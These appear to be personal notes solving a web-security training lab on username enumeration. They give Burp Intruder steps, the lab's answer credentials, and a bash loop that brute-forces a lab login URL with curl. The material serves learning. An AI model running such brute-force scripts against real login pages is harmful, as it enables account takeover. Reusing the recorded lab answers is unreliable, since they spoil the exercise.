🟢Username enumeration via different responses

This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:

Candidate usernames
Candidate passwords

To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.

send POST page to intruder
enter payload list for username
username "an" returns a different length
set up intruder for password field
enter payload list for password
password "monitor" returns a 302 redirect code
using 'an:monitor' solves the lab

Alternative

#!/bin/bash
for u in `cat username.txt`
do
    for p in `cat pwd.txt`
    do
    printf "$u:$p\n"
    curl -F 'username'=$u -F 'password'=$p -s -o /dev/null -w "%{http_code}\n" https://0a8400790418dd1e827f97b900c600df.web-security-academy.net/login
    done
done

This script runs and shows the response code returned.

PreviousAuthentication LabsNext2FA simple bypass

Last updated